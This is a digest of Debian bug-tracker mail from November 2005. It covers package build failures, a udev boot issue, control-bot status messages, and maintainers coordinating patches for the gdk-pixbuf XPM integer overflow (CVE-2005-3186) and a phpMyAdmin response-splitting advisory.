Bug#339424: pygmy: FTBFS: Missing Build-Depends on 'python-dev'
Package: pygmy Version: 0.45+svn77-2 Severity: serious Tags: patch When building 'pygmy' in a clean 'unstable' chroot, I get the following error: dh_testroot # Add here commands to clean up after the build process. python setup.py clean --all make: python: Command not found make: *** [clean] Error 127 Please add the missing Build-Depends on 'python-dev' to debian/control. Regards Andreas Jochens diff -urN ../tmp-orig/pygmy-0.45+svn77/debian/control ./debian/control --- ../tmp-orig/pygmy-0.45+svn77/debian/control 2005-11-16 07:53:43.0 + +++ ./debian/control2005-11-16 07:53:41.0 + @@ -2,7 +2,7 @@ Section: sound Priority: optional Maintainer: Decklin Foster [EMAIL PROTECTED] -Build-Depends-Indep: debhelper (= 4.0.0), python2.3 +Build-Depends-Indep: debhelper, python-dev, python2.3 Standards-Version: 3.6.2 Package: pygmy -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339429: udev requires unix sockets when starting.
Package: udev Version: 0.074-3 Severity: critical Justification: breaks the whole system udev uses unix sockets. if those not available the system end in a state where the dev directory is empty and nothing works rebooting to single usermode with init=/bin/bash and adding the following line as first in the startup part of the init.d script solves this problem. ## fixes the unix socket problem modprobe unix ofcourse this doesn't help when there are no unix sockets available and the is no module. The startup script should check for those conditions before mounting an empty /dev partition in place. regards Robbert -- Package-specific info: -- /etc/udev/rules.d/: /etc/udev/rules.d/: total 0 lrwxr-xr-x 1 root root 20 Jul 27 10:23 020_permissions.rules - ../permissions.rules lrwxrwxrwx 1 root root 19 Oct 19 15:32 025_libgphoto2.rules - ../libgphoto2.rules lrwxrwxrwx 1 root root 16 Nov 11 09:08 025_libsane.rules - ../libsane.rules lrwxr-xr-x 1 root root 19 Jul 27 10:23 cd-aliases.rules - ../cd-aliases.rules lrwxr-xr-x 1 root root 13 Jul 27 10:23 udev.rules - ../udev.rules lrwxrwxrwx 1 root root 19 Sep 7 15:29 z20_persistent.rules - ../persistent.rules lrwxrwxrwx 1 root root 12 Jul 28 12:48 z50_run.rules - ../run.rules lrwxrwxrwx 1 root root 16 Oct 19 15:41 z55_hotplug.rules - ../hotplug.rules lrwxrwxrwx 1 root root 15 Sep 22 15:00 z60_hdparm.rules - ../hdparm.rules lrwxrwxrwx 1 root root 17 Jul 28 12:48 z70_hotplugd.rules - ../hotplugd.rules -- /sys/: /sys/block/hda/dev /sys/block/hda/hda1/dev /sys/block/hda/hda2/dev /sys/block/hda/hda3/dev /sys/block/hda/hda5/dev /sys/block/hdb/dev /sys/class/input/event0/dev /sys/class/input/event1/dev /sys/class/input/event2/dev /sys/class/input/event3/dev /sys/class/input/mice/dev /sys/class/input/mouse0/dev /sys/class/input/mouse1/dev /sys/class/misc/agpgart/dev /sys/class/misc/device-mapper/dev /sys/class/misc/hpet/dev /sys/class/misc/psaux/dev /sys/class/misc/rtc/dev /sys/class/printer/lp0/dev /sys/class/sound/adsp/dev /sys/class/sound/audio/dev /sys/class/sound/controlC0/dev /sys/class/sound/dsp/dev /sys/class/sound/mixer/dev /sys/class/sound/pcmC0D0c/dev /sys/class/sound/pcmC0D0p/dev /sys/class/sound/pcmC0D1c/dev /sys/class/sound/timer/dev /sys/class/usb_device/usbdev1.1/dev /sys/class/usb_device/usbdev2.1/dev /sys/class/usb_device/usbdev2.3/dev /sys/class/usb_device/usbdev3.1/dev /sys/class/usb_device/usbdev4.1/dev -- Kernel configuration: -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.14.1-pundit.13 Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Versions of packages udev depends on: ii initscripts 2.86.ds1-5 Standard scripts needed for bootin ii libc6 2.3.5-8GNU C Library: Shared libraries an ii libselinux1 1.26-1 SELinux shared libraries ii libsepol1 1.8-1 Security Enhanced Linux policy lib ii lsb-base 3.0-11 Linux Standard Base 3.0 init scrip ii makedev 2.3.1-79 creates device files in /dev ii sed 4.1.4-4The GNU sed stream editor udev recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339430: Virtual package octave should depend on the recommended octave2.1
Package: octave Version: 2.9.4-1 Severity: serious This RC bug report is just to prevent the virtual octave package from entering testing. It was wrongly uploaded with octave2.9. The virtual package octave should actually depend on octave2.1, which is the recommended branch. I will keep this bug report open until the situation is fixed in the Debian package pool. -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/dash Kernel: Linux 2.6.8-1-686 Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1) Versions of packages octave depends on: ii octave2.9 2.9.4-1 GNU Octave language for numerical octave recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code
Package: gtk+2.0 Severity: grave Tags: security Justification: user security hole An integer overflow in gdk-pixbuf's XPM rendering code can be exploited to overwrite the heap and exploit arbitrary code through crafted images. Please see www.idefense.com/application/poi/display?id=339type=vulnerabilities for more details. Cheers, Moritz -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.14-1-686 Locale: LANG=C, [EMAIL PROTECTED] (charmap=ISO-8859-15) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#338529: mcvs: FTBFS: dangling symlink /usr/lib/clisp/base/lispinit.mem
On Thursday 10 November 2005 21:29, Roland Stigge wrote: cd code; ./install.sh /usr /tmp/buildd/mcvs-1.0.13/debian/mcvs/ /usr/lib/clisp/base/lisp.run: operating system error during load of initialization file `/usr/lib/clisp/base/lispinit.mem' [spvw_memfile.d:834] Is the clisp package configured? This should not happen if the package is configured. Groetjes, Peter -- signature -at- pvaneynd.mailworks.org http://www.livejournal.com/users/pvaneynd/ God, root, what is difference? Pitr | God is more forgiving. Dave Aronson| -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339437: HTTP Response Splitting vulnerability
Package: phpmyadmin Version: 4:2.6.4-pl3-1 Severity: grave Tags: security Hi I'm not sure if you're aware of new security issue found in phpMyAdmin: http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-6 I know it's too young to be already in archives, however I just want to notify you. -- Michal Čihař | http://cihar.com -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: i386 (i686) Shell: /bin/sh linked to /bin/dash Kernel: Linux 2.6.14-raptor Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Versions of packages phpmyadmin depends on: ii apache2-mpm-prefork [httpd] 2.0.55-3 traditional model for Apache2 ii debconf [debconf-2.0] 1.4.59 Debian configuration management sy ii php5-cgi 5.0.5-3server-side, HTML-embedded scripti ii php5-mysql5.0.5-3MySQL module for php5 ii ucf 2.003 Update Configuration File: preserv Versions of packages phpmyadmin recommends: pn php4-mcrypt | php5-mcrypt none (no description available) -- debconf information: * phpmyadmin/reconfigure-webserver: apache2 * phpmyadmin/restart-webserver: true -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339439: openoffice.org-impress: wrong image colors rendering during fullscreen slideshow
Package: openoffice.org-impress Version: 2.0.0-2 Severity: grave Justification: renders package unusable when an image is inserted in a presentation from a file, the image colors are wrongly rendered during a fullscreen slide show. The color rendering is correct in the windowed view. looks like color transposition (black to blue for instance) and does not depend on graphic format (same situation with tiff, jpeg, png and bmp). -- System Information: Debian Release: testing/unstable APT prefers unstable APT policy: (500, 'unstable') Architecture: powerpc (ppc) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.12.5 Locale: LANG=fr_FR, LC_CTYPE=fr_FR (charmap=ISO-8859-1) Versions of packages openoffice.org-impress depends on: ii libc6 2.3.5-8GNU C Library: Shared libraries an ii libgcc1 1:4.0.2-3 GCC support library ii libstdc++64.0.2-3The GNU Standard C++ Library v3 ii libstlport4.6c2 4.6.2-3STLport C++ class library ii openoffice.org-core 2.0.0-2OpenOffice.org office suite archit ii openoffice.org-draw 2.0.0-2OpenOffice.org office suite - draw openoffice.org-impress recommends no packages. -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339407: sgt-puzzles: ftbfs [sparc] make[1]: *** [blackboxgame.6] Broken pipe
You wrote: sgt-puzzles failed to build on a sparc buildd, but did build on my sparc pbuilder. make -f Makefile.doc make[1]: Entering directory `/build/buildd/sgt-puzzles-6452' halibut --winhelp=puzzles.hlp --text=puzzles.txt puzzles.but halibut --text=HACKING devel.but perl mkmanpages.pl puzzles.but Generating fifteen.6 make[1]: *** [blackboxgame.6] Broken pipe make[1]: Leaving directory `/build/buildd/sgt-puzzles-6452' I noticed that this happened on a previous auto-build attempt on SPARC, and my sponsor has seen it happen once when building on i386. I am investigating this but I'm unconvinced that it is a bug in sgt-puzzles itself. If you look at the text of mkmanpages.pl you'll see the pipeline it's running. Ben. -- Ben Hutchings If the facts do not conform to your theory, they must be disposed of. signature.asc Description: This is a digitally signed message part
Bug#334979: marked as done (proftpd - fails to build)
Your message dated Wed, 16 Nov 2005 03:02:09 -0800 with message-id [EMAIL PROTECTED] and subject line Bug#334979: fixed in proftpd 1.2.10-25 has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 21 Oct 2005 09:06:21 + From [EMAIL PROTECTED] Fri Oct 21 02:06:21 2005 Return-path: [EMAIL PROTECTED] Received: from mx03.uni-tuebingen.de [134.2.3.13] by spohr.debian.org with esmtp (Exim 3.36 1 (Debian)) id 1ESsqz-0001R3-00; Fri, 21 Oct 2005 02:06:21 -0700 Received: from mobilewave.waldi.eu.org (vpn0274.extern.uni-tuebingen.de [134.2.165.24]) by mx03.uni-tuebingen.de (8.12.3/8.12.3) with ESMTP id j9L96Jxq020987 for [EMAIL PROTECTED]; Fri, 21 Oct 2005 11:06:19 +0200 Received: by mobilewave.waldi.eu.org (Postfix, from userid 1000) id C21E218527; Fri, 21 Oct 2005 11:06:16 +0200 (CEST) Date: Fri, 21 Oct 2005 11:06:16 +0200 From: Bastian Blank [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: proftpd - fails to build Message-ID: [EMAIL PROTECTED] References: [EMAIL PROTECTED] MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Disposition: inline In-Reply-To: [EMAIL PROTECTED] User-Agent: Mutt/1.5.11 X-AntiVirus: checked by AntiVir Milter (version: 1.1.0-7; AVE: 6.32.0.8; VDF: 6.32.0.105; host: mx03) Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE autolearn=no version=2.60-bugs.debian.org_2005_01_02 Package: proftpd Version: 1.2.10-24.0.1 Severity: serious There was an error while trying to autobuild your package: Automatic build of proftpd_1.2.10-24.0.1 on debian01 by sbuild/s390 69 [...] gcc -Wall -O3 -Wall -D_LARGEFILE64_SOURCE -D_FILE_OFFSET_BITS=64 -DHAVE_OPENSSL -DUSE_LDAP_TLS -I.. -I../../.. -DLINUX -I.. -I../../../include -I/usr/include/postgresql -O2 -Wall -c ../../../modules/mod_tls.c .../../../modules/mod_tls.c: In function 'tls_check_client_cert': .../../../modules/mod_tls.c:448: warning: pointer targets in initialization differ in signedness .../../../modules/mod_tls.c:470: warning: pointer targets in initialization differ in signedness .../../../modules/mod_tls.c: In function 'tls_passphrase_cb': .../../../modules/mod_tls.c:570: error: 'PEM_F_DEF_CALLBACK' undeclared (first use in this function) .../../../modules/mod_tls.c:570: error: (Each undeclared identifier is reported only once .../../../modules/mod_tls.c:570: error: for each function it appears in.) .../../../modules/mod_tls.c: In function 'tls_init_ctxt': .../../../modules/mod_tls.c:908: warning: pointer targets in passing argument 2 of 'SSL_CTX_set_session_id_context' differ in signedness .../../../modules/mod_tls.c: In function 'tls_setup_cert_dn_environ': .../../../modules/mod_tls.c:1792: warning: pointer targets in passing argument 2 of 'pstrndup' differ in signedness .../../../modules/mod_tls.c:1798: warning: pointer targets in passing argument 2 of 'pstrndup' differ in signedness .../../../modules/mod_tls.c:1804: warning: pointer targets in passing argument 2 of 'pstrndup' differ in signedness .../../../modules/mod_tls.c:1810: warning: pointer targets in passing argument 2 of 'pstrndup' differ in signedness .../../../modules/mod_tls.c:1816: warning: pointer targets in passing argument 2 of 'pstrndup' differ in signedness .../../../modules/mod_tls.c:1822: warning: pointer targets in passing argument 2 of 'pstrndup' differ in signedness .../../../modules/mod_tls.c:1828: warning: pointer targets in passing argument 2 of 'pstrndup' differ in signedness .../../../modules/mod_tls.c:1834: warning: pointer targets in passing argument 2 of 'pstrndup' differ in signedness .../../../modules/mod_tls.c:1840: warning: pointer targets in passing argument 2 of 'pstrndup' differ in signedness .../../../modules/mod_tls.c:1846: warning: pointer targets in passing argument 2 of 'pstrndup' differ in signedness .../../../modules/mod_tls.c:1852: warning: pointer targets in passing argument 2 of 'pstrndup' differ in signedness .../../../modules/mod_tls.c:1862: warning: pointer targets in passing argument 2 of 'pstrndup' differ in signedness .../../../modules/mod_tls.c:1868: warning: pointer targets in passing argument 2 of 'pstrndup' differ in signedness make[2]: *** [mod_tls.o] Error 1 make[2]: Leaving
Bug#339446: synaptic_0.57.5.1.exp4(sparc/experimental): FTBFS: build-dep to lax?
Package: synaptic Version: 0.57.5.1.exp4 Severity: serious Hi, you probably need to tighten your build-dependencies on libapt-pkg-dev... | Automatic build of synaptic_0.57.5.1.exp4 on odin by sbuild/sparc 69 | Build started at 20051116-0728 | ** | Checking available source versions... | Fetching source files... | Reading Package Lists... | Building Dependency Tree... | Need to get 2410kB of source archives. | Get:1 http://sinclair.farm.ftbfs.de experimental/main synaptic 0.57.5.1.exp4 (dsc) [723B] | Get:2 http://sinclair.farm.ftbfs.de experimental/main synaptic 0.57.5.1.exp4 (tar) [2410kB] | Fetched 2410kB in 0s (5981kB/s) | Download complete and in download only mode | ** Using build dependencies supplied by package: | Build-Depends: debhelper ( 3.0.0), libapt-pkg-dev (= 0.6.40.1), gettext, libgtk2.0-dev, libvte-dev (= 0.11.11), libglade2-dev, libxft2-dev, scrollkeeper, scrollkeeper, intltool, xmlto, libsm-dev , sharutils, dpatch, lsb-release, dpkg (= 1.13.9) [...] | if g++ -DHAVE_CONFIG_H -I. -I. -I.. -I/usr/include/apt-pkg -DXTHREADS -I/usr/include/gtk-2.0 -I/usr/lib/gtk-2.0/include -I/usr/X11R6/include -I/usr/include/atk-1.0 -I/usr/include/pango-1.0 -I/usr/include/freetype2 -I/usr/include/glib-2.0 -I/usr/lib/glib-2.0/include -I/usr/include/libglade-2.0 -I/usr/include/libxml2 -DSYNAPTICLOCALEDIR=\/usr/share/locale\ -DSYNAPTICSTATEDIR=\/var/lib/synaptic\-g -O2 -MT rpackage.o -MD -MP -MF .deps/rpackage.Tpo \ | -c -o rpackage.o `test -f 'rpackage.cc' || echo './'`rpackage.cc; \ | then mv -f .deps/rpackage.Tpo .deps/rpackage.Po; \ | else rm -f .deps/rpackage.Tpo; exit 1; \ | fi | rpackage.cc: In member function 'const char* RPackage::summary()': | rpackage.cc:127: error: 'DescIterator' is not a member of 'pkgCache' | rpackage.cc:127: error: expected `;' before 'Desc' | rpackage.cc:128: error: 'Desc' was not declared in this scope | rpackage.cc: In member function 'const char* RPackage::description()': | rpackage.cc:214: error: 'DescIterator' is not a member of 'pkgCache' | rpackage.cc:214: error: expected `;' before 'Desc' | rpackage.cc:215: error: 'Desc' was not declared in this scope | make[3]: *** [rpackage.o] Error 1 | make[3]: Leaving directory `/build/buildd/synaptic-0.57.5.1.exp4/common' | make[2]: *** [all-recursive] Error 1 | make[2]: Leaving directory `/build/buildd/synaptic-0.57.5.1.exp4' | make[1]: *** [all] Error 2 | make[1]: Leaving directory `/build/buildd/synaptic-0.57.5.1.exp4' | make: *** [build-stamp] Error 2 | ** | Build finished at 20051116-0732 | FAILED [dpkg-buildpackage died] Full build log(s): http://experimental.ftbfs.de/build.php?ver=0.57.5.1.exp4pkg=synapticarch=sparc Gruesse, -- Frank Lichtenheld [EMAIL PROTECTED] www: http://www.djpig.de/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339437: HTTP Response Splitting vulnerability
Dnia Wednesday 16 of November 2005 11:23, Michal Čihař napisał: I'm not sure if you're aware of new security issue found in phpMyAdmin: http://www.phpmyadmin.net/home_page/security.php?issue=PMASA-2005-6 I know it's too young to be already in archives, however I just want to notify you. Yes, I know. The issue was dicussed on debian-security. The register_globals is disabled in Debian's phpmyadmin package by default so the bug is no such critical at the moment. New version will be available for sid and sarge ASAP. -- .''`.Piotr Roszatycki, Netia SA : :' :mailto:[EMAIL PROTECTED] `. `' mailto:[EMAIL PROTECTED] `-
Processed: Re: Bug#339429: udev requires unix sockets when starting.
Processing commands for [EMAIL PROTECTED]: severity 339429 normal Bug#339429: udev requires unix sockets when starting. Severity set to `normal'. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339429: udev requires unix sockets when starting.
severity 339429 normal thanks On Nov 16, Robbert Muller [EMAIL PROTECTED] wrote: The startup script should check for those conditions before mounting an empty How? Is the existence of /proc/net/unix enough? Anyway, on a correctly configured system af_unix would be autoloaded. -- ciao, Marco signature.asc Description: Digital signature
Processed: Re: Bug#339437: HTTP Response Splitting vulnerability
Processing commands for [EMAIL PROTECTED]: found 339437 4:2.6.4-pl3-1 Bug#339437: HTTP Response Splitting vulnerability Bug marked as found in version 4:2.6.4-pl3-1. -- Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339456: gconf2_2.12.1-2(m68k/experimental):
Package: gconf2 Version: 2.12.1-2 Severity: serious There was an error while trying to autobuild your package: Automatic build of gconf2_2.12.1-2 on quickstep by sbuild/m68k 69 Build started at 20051115-2140 [...] ** Using build dependencies supplied by package: Build-Depends: debhelper ( 4.1.0), cdbs, liborbit2-dev (= 1:2.10.2-1.1), libpopt-dev, libxml2-dev, zlib1g-dev, gettext, gcc (= 3:3.2.2), libgtk2.0-dev, gnome-pkg-tools [...] dh_installchangelogs -plibgconf2-dev ./ChangeLog dh_install -plibgconf2-dev dh_link -plibgconf2-dev dh_scrollkeeper -plibgconf2-dev if test -x /usr/bin/dh_gconf; then dh_gconf -plibgconf2-dev ; fi if test -x /usr/bin/dh_desktop; then dh_desktop -plibgconf2-dev ; fi if test ; then :; else dh_strip -pgconf2 ; fi dh_compress -pgconf2 -X usr/share/doc/gconf2/html dh_fixperms -pgconf2 if test ; then :; else dh_makeshlibs -pgconf2 -Xbackend; fi dh_installdeb -pgconf2 dh_perl -pgconf2 dh_python -pgconf2 dh_python: Python is not installed, aborting. (Probably forgot to Build-Depend on python.) make: *** [binary-predeb/gconf2] Error 1 A full build log can be found at: http://buildd.debian.org/build.php?arch=m68kpkg=gconf2ver=2.12.1-2 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code
tags 339431 + patch thanks On Wed, Nov 16, 2005, Moritz Muehlenhoff wrote: An integer overflow in gdk-pixbuf's XPM rendering code can be exploited to overwrite the heap and exploit arbitrary code through crafted images. Please see www.idefense.com/application/poi/display?id=339type=vulnerabilities for more details. Redhat's bug report for CVE-2005-3186 with a patch attached: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=171071 Did you identify other packages with a copy of this code? In particular, did you check Gtk 1? The Redhat security advisory also fixes CVE-2005-2975, for which I see no entry in the Debian changelog, could you please investifate on this id and report whether gtk1 and gtk2 are affected for Debian? Redhat's advisories: http://rhn.redhat.com/errata/RHSA-2005-810.html http://rhn.redhat.com/errata/RHSA-2005-811.html Redhat bug for CVE-2005-2975 with two patches attached: https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=171900 Cheers, -- Loïc Minier [EMAIL PROTECTED] What do we want? BRAINS!When do we want it? BRAINS!
Processed: Re: Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code
Processing commands for [EMAIL PROTECTED]: tags 339431 + patch Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code Tags were: security Tags added: patch thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: Bug#339437: HTTP Response Splitting vulnerability
Processing commands for [EMAIL PROTECTED]: found 339437 4:2.6.2-3sarge1 Bug#339437: HTTP Response Splitting vulnerability Bug marked as found in version 4:2.6.2-3sarge1. -- Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code
Security team, did you start work on CVE-2005-3186 and CVE-2005-2975, CVE-2005-2976 (not described in this report)? Ubuntu has released some packages which might help http://www.ubuntu.com/usn/usn-216-1. Do you need the Gtk maintainers to prepare an upload for stable? Uploads are being prepared for unstable and experimental by Sebastien Bacher (thanks Seb). Cheers, -- Loïc Minier [EMAIL PROTECTED] What do we want? BRAINS!When do we want it? BRAINS!
Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code
clone 339431 -1 reassign -1 gdk-pixbuf thanks Hi, I believe gdk-pixbuf is affected as well. I suppose you can grab useful patches from the Ubuntu security fixes: http://www.ubuntu.com/usn/usn-216-1 Cheers, -- Loïc Minier [EMAIL PROTECTED] What do we want? BRAINS!When do we want it? BRAINS!
Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code
On Wed, Nov 16, 2005 at 02:05:11PM +0100, Loic Minier wrote: Security team, did you start work on CVE-2005-3186 and CVE-2005-2975, CVE-2005-2976 (not described in this report)? Ubuntu has released some packages which might help http://www.ubuntu.com/usn/usn-216-1. Do you need the Gtk maintainers to prepare an upload for stable? That would certainly be appreciated. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Re: Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code
Processing commands for [EMAIL PROTECTED]: clone 339431 -1 Bug#339431: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code Bug 339431 cloned as bug 339458. reassign -1 gdk-pixbuf Bug#339458: CVE-2005-3186: Integer overflow in gdk-pixbuf's XPM code Bug reassigned from package `gtk+2.0' to `gdk-pixbuf'. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Processed: Fixed in upload of cupsys 1.1.99.b1.r4841-1 to experimental
Processing commands for [EMAIL PROTECTED]: tag 339120 + fixed-in-experimental Bug#339120: cupsys_1.1.99.b1.r4748-4(sparc/experimental): FTBFS: ld failed Tags were: experimental Tags added: fixed-in-experimental quit Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#339456: marked as done (gconf2_2.12.1-2(m68k/experimental):)
Your message dated Wed, 16 Nov 2005 14:08:36 +0100 with message-id [EMAIL PROTECTED] and subject line Bug#339456: gconf2_2.12.1-2(m68k/experimental): has caused the attached Bug report to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database) -- Received: (at submit) by bugs.debian.org; 16 Nov 2005 12:51:47 + From [EMAIL PROTECTED] Wed Nov 16 04:51:47 2005 Return-path: [EMAIL PROTECTED] Received: from country.nixsys.be ([195.144.77.46] helo=grep.be) by spohr.debian.org with esmtp (Exim 4.50) id 1EcMea-0005wr-45 for [EMAIL PROTECTED]; Wed, 16 Nov 2005 04:44:44 -0800 Received: from wouter by grep.be with local (Exim 4.54) id 1EcMeW-0001xr-Lu for [EMAIL PROTECTED]; Wed, 16 Nov 2005 13:44:40 +0100 Date: Wed, 16 Nov 2005 13:44:40 +0100 From: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: gconf2_2.12.1-2(m68k/experimental): Message-ID: [EMAIL PROTECTED] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.11 Sender: Wouter Verhelst,,, [EMAIL PROTECTED] Delivered-To: [EMAIL PROTECTED] X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-6.4 required=4.0 tests=BAYES_00,HAS_PACKAGE, NO_REAL_NAME autolearn=no version=2.60-bugs.debian.org_2005_01_02 Package: gconf2 Version: 2.12.1-2 Severity: serious There was an error while trying to autobuild your package: Automatic build of gconf2_2.12.1-2 on quickstep by sbuild/m68k 69 Build started at 20051115-2140 [...] ** Using build dependencies supplied by package: Build-Depends: debhelper ( 4.1.0), cdbs, liborbit2-dev (= 1:2.10.2-1.1), libpopt-dev, libxml2-dev, zlib1g-dev, gettext, gcc (= 3:3.2.2), libgtk2.0-dev, gnome-pkg-tools [...] dh_installchangelogs -plibgconf2-dev ./ChangeLog dh_install -plibgconf2-dev dh_link -plibgconf2-dev dh_scrollkeeper -plibgconf2-dev if test -x /usr/bin/dh_gconf; then dh_gconf -plibgconf2-dev ; fi if test -x /usr/bin/dh_desktop; then dh_desktop -plibgconf2-dev ; fi if test ; then :; else dh_strip -pgconf2 ; fi dh_compress -pgconf2 -X usr/share/doc/gconf2/html dh_fixperms -pgconf2 if test ; then :; else dh_makeshlibs -pgconf2 -Xbackend; fi dh_installdeb -pgconf2 dh_perl -pgconf2 dh_python -pgconf2 dh_python: Python is not installed, aborting. (Probably forgot to Build-Depend on python.) make: *** [binary-predeb/gconf2] Error 1 A full build log can be found at: http://buildd.debian.org/build.php?arch=m68kpkg=gconf2ver=2.12.1-2 --- Received: (at 339456-done) by bugs.debian.org; 16 Nov 2005 13:08:23 + From [EMAIL PROTECTED] Wed Nov 16 05:08:23 2005 Return-path: [EMAIL PROTECTED] Received: from sakura.malsain.org ([82.241.136.161]) by spohr.debian.org with esmtp (Exim 4.50) id 1EcN1Q-0004Kq-Rw for [EMAIL PROTECTED]; Wed, 16 Nov 2005 05:08:23 -0800 Received: from silicium.ccc.cea.fr ([132.165.91.101]) by sakura.malsain.org with esmtp (Exim 4.50) id 1EcN12-00063K-09; Wed, 16 Nov 2005 14:07:56 +0100 Subject: Re: Bug#339456: gconf2_2.12.1-2(m68k/experimental): From: Josselin Mouette [EMAIL PROTECTED] To: [EMAIL PROTECTED], [EMAIL PROTECTED] In-Reply-To: [EMAIL PROTECTED] References: [EMAIL PROTECTED] Content-Type: text/plain; charset=ISO-8859-15 Date: Wed, 16 Nov 2005 14:08:36 +0100 Message-Id: [EMAIL PROTECTED] Mime-Version: 1.0 X-Mailer: Evolution 2.0.4 Content-Transfer-Encoding: quoted-printable X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 (1.212-2003-09-23-exp) on spohr.debian.org X-Spam-Level: X-Spam-Status: No, hits=-11.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER, HAS_PACKAGE autolearn=ham version=2.60-bugs.debian.org_2005_01_02 Package: gconf2 Version: 2.12.1-4 Le mercredi 16 novembre 2005 =E0 13:44 +0100, [EMAIL PROTECTED] a =E9crit : Package: gconf2 Version: 2.12.1-2 Severity: serious =20 There was an error while trying to autobuild your package: dh_python: Python is not installed, aborting. (Probably forgot to Build= -Depend on python.) make: *** [binary-predeb/gconf2] Error 1 Thanks for the report. This bug has since been fixed in a further upload. Regards, --=20 .''`. Josselin Mouette/\./\ : :' : [EMAIL PROTECTED] `. `'[EMAIL PROTECTED] `- Debian 